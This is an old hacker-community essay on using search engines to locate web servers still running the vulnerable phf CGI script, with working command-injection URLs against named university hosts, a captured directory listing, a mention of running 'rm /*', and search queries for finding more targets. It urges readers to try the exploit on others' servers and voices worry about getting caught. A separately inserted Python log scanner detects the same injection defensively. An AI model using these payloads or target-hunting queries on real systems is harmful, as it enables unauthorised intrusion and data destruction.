(Courtesy of fravia's advanced searching lores ~ April 1998)

by +Thor

I'm not a native English speaker - like many (most?) other reversers - so please excuse my poor language.

Knowledge is knowledge's reward

So what is all this about? Is it about hacking? I don't know; I think it's about searching the Net.

I'll agree at this point (and many others) with Fravia+, who says in one of his pages that you can find everything on a computer near you (or not) on the Internet.

I have an example of searching the net effectively from my personal experience, and it is good to share
it with you fellow +HCUkers. Somebody asked me to find some computers with the PHF exploit.
I wanted to test it and see how it works, so I decided to help him. For those of you who know nothing about it,
DON'T expect me to explain it: just search for it through the regular search engines (use your favourite, which in my
opinion must support boolean searches) or search Fravia+'s pages to find out about it.
If you don't know how, I must insist: learn how to use the most important search engines first, come to the reversing/hacking/whatever stuff later :-)


I did it once with his site (sorry). Here is the story. I was searching for something (I don't remember what now)
and I was sure that I had read something about it in Fravia's labyrinth of pages.
I did a search with AltaVista (my favourite), adding the keyword host:www.fravia.org and then
the string I was searching for. What this means is that I asked a main search engine
to search only inside a specific host for the string I was looking for.
Unfortunately my search didn't fish out anything at all. What do you do then in such cases? Quit? NO.
Just go to the engine's Add URL page and add the pages you are interested in.
After one or two days max, perform the same search once more and you'll have your results.
(You see, fravia+'s laziness is sometimes good, because you have to find new ways to get your job done :-).

Ok. Ok. For those of you who are lazy enough, try Simple Nomad's WWW hack FAQ (www.nmrc.org).

OOPS! Back to our subject: the phf exploit. I tried 5 or 6 URLs with no result, because it is too old
an exploit and many servers (by no means all :-) have fixed it already... Then I realized it was boring to do this and I didn't want to get caught, since my IP address would be in numerous log files on the target's computer. But wait a minute... aren't machines born to serve us?

So I thought (since I was looking for a file) I could do an FTP search and see what I'd come up with.
Try it: go to http://ftpsearch.ntnu.no (search Fravia+'s pages again to see other URLs of this search engine; many thanks to Robin Hood+) and make a search for phf. When you study the results you begin thinking.

1. All these servers, or some of them, may have the magical file installed!

2. Most FTP servers are installed on the same machines as HTTP servers, and therefore they have the
same name with one little difference: we MUST change the ftp portion of the name to www.

EXAMPLE

We can see that one of the engine's answers was ftp.cs.yale.edu /usr/local/etc/httpd/cgi-bin/phf. Hmmm, maybe we can fish out something if we try it, because of the edu URL. They don't dig it too much. Let's try the www location.

I gave my Netscape browser the URL http://www.cs.yale.edu/ and came up with a Yale University screen.
Oh! Noo. I read: Yale University Computer Science Department. They have probably fixed it, but since we came that far, let's give it a try.

I gave my Netscape browser the URL http://www.cs.yale.edu/cgi-bin/phf?Qalias=x%0als
And here is the surprise!! Their server was very kind and friendly and answered my question. Here is its answer:

Query Results

/usr/local/bin/ph -m alias=x ls

-515:no non-null key field in query.
-515:Initial metas may be used as qualifiers only.
500:Did not understand query.
archie
calendar
cookie
cookie.orig
csdptwww
date
finger
finger-dist
fortune
gmt-saytime.au
gmt-saytime.au.bak
guest-log
homepage
imagemap
info2www
jj
long
lwgate
mail
mail-feedback
nph-test-cgi
phf
post-query
query
saynumber.au
saytime.au
saytime.au.bak
search.pl
slade
src
test-cgi
test-cgi.tcl

test-env
uptime
view-source
wais-ncsa-httpd.pl
wais.pl
xiao

What does it mean? Imagine! The current directory listing. Of course we can give many more commands, like Fravia's
rm /*
which I DO NOT recommend! Anyway, I told you to check out fravia+'s pages... Try it on stupid servers if you can get them... But please DON'T damage the targets above. It would be very stupid, and very easily fixed by the server's administrators once you do it. So leave the servers above undisturbed, so that other readers reading this essay can check them out.
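The server's answer above shows what the %0a in the query did: the decoded newline ended the arguments of ph and started a second command (ls). As an added example, not part of the essay, here is a small Python scanner written from the server administrator's side: it reads NCSA/Apache common-format access log lines, decodes each query string, and flags phf requests that carry a newline, reporting the appended command. The log lines are constructed placeholders, not the servers named in the essay.

```python
import re
from urllib.parse import unquote, urlsplit

# NCSA common log format: client ident user [time] "method url protocol" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample log (placeholder clients from the documentation range 192.0.2.0/24).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Apr/1998:12:00:01 +0000] "GET /cgi-bin/phf?Qalias=x%0als HTTP/1.0" 200 1536
192.0.2.11 - - [10/Apr/1998:12:00:05 +0000] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 412
192.0.2.12 - - [10/Apr/1998:12:00:09 +0000] "GET /cgi-bin/phf?Qalias=x%0Auptime HTTP/1.0" 404 210
192.0.2.13 - - [10/Apr/1998:12:00:12 +0000] "GET /index.html HTTP/1.0" 200 2048
"""


def injected_command(url):
    """Return the text that followed a newline in a phf query, or None.

    phf passed the decoded query to /usr/local/bin/ph unescaped, so a %0a (or %0A)
    in the query became a shell newline and whatever followed it ran as a new command.
    A phf request without a newline (a plain directory lookup) is not flagged.
    """
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/phf"):
        return None
    decoded = unquote(parts.query)          # %0a and %0A both decode to "\n"
    if "\n" not in decoded:
        return None
    return decoded.split("\n", 1)[1].strip()


def scan_log(text):
    """Parse each log line and collect phf requests that carried an injected command."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                         # skip lines that are not in common log format
        client, when, method, url, status = m.groups()
        cmd = injected_command(url)
        if cmd is not None:
            hits.append({"client": client, "time": when, "status": int(status), "command": cmd})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Note that the 404 line is still reported: a request is an attempt whether or not phf was still installed, and the fix on the server side is to remove the phf CGI from cgi-bin altogether.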

3. Back to our thinking job. Maybe we can do the same thing with a web search. My favourite is Digital's (AltaVista).
Since we want the edu domain, as he (my friend) said, because they have the best chance of having it installed,
we give the command domain:edu and the engine will search only that domain.

4. Shoot: http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=domain%3Aedu+%2Bcgi-bin+%2Bphf&search.x=21&search.y=12

5. Begin the search and you will find diamonds. I tried one or two. If anybody tries this one,
it will work, and I'm sure others will too: http://www.met.tamu.edu/cgi-bin/phf?QAlias=x%0als

6. Make a search in the edu domain and search only for the links that refer to cgi-bin/phf!!!
Is this kool or what!!! Again I'll use Digital: http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=domain%3Aedu+link%3Acgi-bin%2Fphf&search.x=55&search.y=5

7. Make a search without the domain to see what you can find. Still, most of them are
universities. (Probably the guy was right.) http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=link%3Acgi-bin%2Fphf&next.x=43&next.y=9

Alright, for those who don't know about domain:, host:, link: etc., follow the next link
http://www.altavista.digital.com/av/content/help_simple.htm , or read.
What? Of course, the HCU pages. You can find a lot there about searching the net. Another good tactic is to
read the help files of the search engines. It's all in there, in front of our eyes. All we have to do is
just press the little button named Help.

SEARCH. Search for Simple Nomad's WEB hack FAQ. Many interesting things in there.

SEARCH. Find GTMHH. Very educational; all about email headers, etc.

Hey! I don't give you these links, because +Orc's tactic is to leave
something for the "student". Anyway, they are the easiest thing to find.

I want to send my greetings to Aesculapius (where have you got lost?). I love this great +Teacher!

Of course, thanks go to Fravia+ because he made +Orc's dream come true.


Thor+
Keep On


(c) 2000: [fravia+], all rights reserved